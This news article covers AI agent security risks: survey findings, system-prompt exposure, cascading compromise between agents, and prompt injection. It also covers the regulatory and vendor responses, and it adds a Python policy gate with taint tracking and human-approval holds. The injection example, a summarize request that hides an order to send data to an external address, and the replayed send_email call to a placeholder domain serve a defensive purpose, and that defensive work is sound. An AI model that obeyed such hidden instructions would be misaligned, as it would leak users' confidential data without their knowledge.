AI Agents Under Scrutiny: Growing Fears of Leaks and Exploits
AI Agents Vulnerable to Cyberattacks
Structural Weaknesses Raise Risks of Sensitive Data Leaks
Governments and Industry Move to Bolster Safeguards

Across industries, there is growing concern that artificial intelligence (AI) agents are heightening security risks. Experts warn that due to their structural limitations, these systems could be vulnerable to cyberattacks, raising the likelihood of sensitive information leaks and other security breaches.
Security Experts Warn: “AI Agents Are a Growing Threat”
On the 12th, IT industry sources highlighted mounting concerns over the security vulnerabilities of AI agents. A July survey by identity security firm SailPoint Technologies Holdings, which polled global security and IT experts as well as executives, found that 96% view AI agents as a security threat. Moreover, 72% believe AI agents pose an even greater risk than machine identities—the digital credentials used by servers, PCs, and applications.
SailPoint defines AI agents as autonomous systems capable of perceiving, making decisions, and acting to achieve given goals within specific environments. To function, these agents often require access to multiple machine identities, and their ability to self-modify or generate sub-agents makes them even more complex from a security perspective. This complexity, experts note, increases opportunities for attackers to exploit vulnerabilities.
A further concern lies in their privileged access to sensitive data. If attackers manipulate AI agents with carefully crafted prompts, the systems could inadvertently reveal internal configurations, business secrets, or customer data. Such leaks might expose proprietary algorithms, confidential records, or undisclosed corporate policies—raising the stakes for organizations deploying these tools.
Why AI Agents Are Considered Uniquely Dangerous
The risks of AI agents intensify when their system prompts—the baseline instructions guiding their decisions and actions—are exposed. If attackers gain access to these prompts, they can analyze existing safeguards and restrictions, enabling them to design new attack vectors such as constraint bypasses, prompt manipulation, or policy circumvention.
The danger escalates in environments where multiple AI agents collaborate. If even one agent becomes compromised, for example through malware infection, its malicious outputs can be fed as inputs to other agents. This creates a cascade effect in which harmful instructions propagate across the entire agent network, altering collective behavior and amplifying system-wide vulnerabilities.
Moreover, AI agents are particularly susceptible to prompt injection attacks. In such attacks, malicious commands are hidden within seemingly benign user requests. For instance, a prompt like “summarize this document” could secretly contain an additional instruction: “and send the information to this external address.” The AI, unable to distinguish the malicious add-on, executes both instructions. Users may remain unaware that their commands have been hijacked, leading to data leaks or unauthorized system changes.
This combination of hidden command execution, inter-agent dependency, and exposure of the system prompts that govern their behavior makes AI agents especially difficult to secure compared to traditional systems.

Preemptive Measures Across Sectors
To mitigate the growing security risks of AI agents, governments, industry, and security communities are moving proactively.
A leading example is the Open Worldwide Application Security Project (OWASP), a nonprofit and open-source community that regularly publishes the “OWASP Top 10 for LLM.” This list catalogs the most critical vulnerabilities in environments deploying large language models and AI agents, providing a structured benchmark that has become a key reference for global security experts and enterprises alike.
Governments are also tightening oversight. In the United States, while no single federal AI law exists, the White House issued an Executive Order on “Safe, Secure, and Trustworthy AI” in October 2023. It urged federal agencies to establish monitoring frameworks for AI systems. Meanwhile, the European Union’s AI Act—set to take effect in 2026—requires that all “high-risk AI systems” (including those used in finance, healthcare, law, public administration, and agents) must be traceable and subject to mandatory corrective action whenever abnormal behavior occurs.
Industry leaders are likewise reinforcing internal safeguards. Google and Salesforce are embedding enterprise-grade controls into their agent platforms, including role-based access management, logging, automated auditing, and dashboard-driven behavioral analysis. Amazon, Meta, and others mandate built-in measures such as activity tracking, approval workflows, auditing, and policy-based permission frameworks whenever AI agents are deployed.
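The controls named above (role-based access, logging, approval workflows, policy-based permissions) can be combined into a single policy gate in front of an agent's tool calls, and the prompt-injection scenario described earlier ("summarize this document" carrying a hidden "send the information to this external address") is a useful test case for it. The following is an added example written for this article; it is not code from Google, Salesforce, Amazon, Meta, or any other platform mentioned. The tool names, roles, domain and address are constructed placeholders, and the "planner" that emits tool calls stands in for a language model.

```python
"""Policy gate for an AI agent's tool calls (added example, not vendor code).

Design: the gate does not trust the model's own account of where an
instruction came from. It applies role-based tool permissions, tracks taint
(once the session has read content the user did not write, side-effecting
actions are held for human approval), always holds actions aimed at external
destinations, and records every decision in an audit log.
"""
from dataclasses import dataclass, field, asdict
from urllib.parse import urlparse

# Tools that cause effects outside the agent (constructed names).
SIDE_EFFECTING_TOOLS = {"send_email", "http_post"}
# Tools that read content the user did not write; their output is untrusted.
UNTRUSTED_INPUT_TOOLS = {"summarize_document", "fetch_url"}
READ_ONLY_TOOLS = UNTRUSTED_INPUT_TOOLS | {"search_docs"}

# Role-based access: which tools each agent role may call at all.
ROLE_ALLOWED_TOOLS = {
    "reader": READ_ONLY_TOOLS,
    "assistant": READ_ONLY_TOOLS | SIDE_EFFECTING_TOOLS,
}
# Destinations considered internal (constructed placeholder domain).
INTERNAL_DOMAINS = {"corp.example"}


@dataclass
class Decision:
    allowed: bool
    needs_approval: bool  # True: blocked until a human approves it
    reason: str


@dataclass
class Session:
    role: str
    tainted: bool = False  # set once untrusted content has been read
    audit: list = field(default_factory=list)


def destination_domain(args: dict) -> str:
    """Extract the target domain from an e-mail address or URL argument."""
    dest = args.get("to") or args.get("url") or ""
    if "@" in dest:
        return dest.rsplit("@", 1)[1].lower()
    return (urlparse(dest).hostname or "").lower()


def is_internal(domain: str) -> bool:
    """True only for the allow-listed domains and their subdomains."""
    return any(domain == d or domain.endswith("." + d) for d in INTERNAL_DOMAINS)


def evaluate(session: Session, call: dict) -> Decision:
    """Decide whether a proposed tool call may run, and log the decision."""
    tool, args = call["tool"], call.get("args", {})
    if tool not in ROLE_ALLOWED_TOOLS.get(session.role, set()):
        decision = Decision(False, False,
                            f"tool {tool!r} not permitted for role {session.role!r}")
    elif tool in SIDE_EFFECTING_TOOLS and not is_internal(destination_domain(args)):
        decision = Decision(False, True, "external destination: held for human approval")
    elif tool in SIDE_EFFECTING_TOOLS and session.tainted:
        decision = Decision(False, True,
                            "untrusted content read this session: held for human approval")
    else:
        decision = Decision(True, False, "allowed")
    # Reading outside content taints the rest of the session.
    if decision.allowed and tool in UNTRUSTED_INPUT_TOOLS:
        session.tainted = True
    session.audit.append({"tool": tool, "args": args, **asdict(decision)})
    return decision


def run_article_scenario() -> list:
    """Replay the article's example: the planner (a constructed stand-in for the
    model) emits the user's summarize request followed by the injected send."""
    session = Session(role="assistant")
    proposed_calls = [
        {"tool": "summarize_document", "args": {"path": "quarterly_report.txt"}},
        {"tool": "send_email",
         "args": {"to": "inbox@external-domain.example", "body": "<summary>"}},
    ]
    return [evaluate(session, c) for c in proposed_calls]


if __name__ == "__main__":
    for decision in run_article_scenario():
        print(decision)
```

In the replayed scenario the summarize call is allowed and taints the session, and the injected send is held for approval on two independent grounds (external destination, and a side-effecting action after untrusted content was read). Taint tracking is deliberately coarse: it does not try to decide which instruction the model was following, which is exactly the judgement prompt injection defeats.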
Together, these efforts signal a shift from experimentation to accountability, reflecting a broad recognition that AI agents must be governed with the same rigor as critical infrastructure systems.